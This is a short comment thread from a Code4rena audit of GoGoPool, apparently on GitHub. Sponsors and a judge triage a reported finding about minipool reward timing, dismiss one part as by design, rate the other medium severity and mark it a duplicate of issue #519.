#1 - 0xju1ie
2023-01-13T21:42:45Z
The first issue they bring up is not a bug - it is by design and known.
The second bug is likely valid - it should look at the minipools time in system rather than the stakers reward start time. Not sure on the severity of that though
#2 - emersoncloud
2023-01-13T21:47:47Z
I agree with @0xju1ie, first point is not an issue. We want to reward Node Operators for minipools as long as they have been in the protocol in some sense for 14 days or longer.
Part 2 - I think the severity of being able to cancel a minipool immediately is medium not high. There isn't a loss of funds associated with cancelling minipools quickly.
#3 - 0xju1ie
2023-01-16T21:34:15Z
should split up since first one is invalid and second one is medium and dupe of https://github.com/code-423n4/2022-12-gogopool-findings/issues/519
#4 - c4-judge
2023-01-29T19:29:54Z
GalloDaSballo marked the issue as duplicate of #519
#5 - GalloDaSballo
2023-01-29T19:29:59Z
Taking issue 2 and duping under 519
#6 - c4-judge
2023-02-08T10:03:43Z
GalloDaSballo changed the severity to 2 (Med Risk)
#7 - c4-judge
2023-02-08T10:04:28Z
GalloDaSballo marked the issue as satisfactory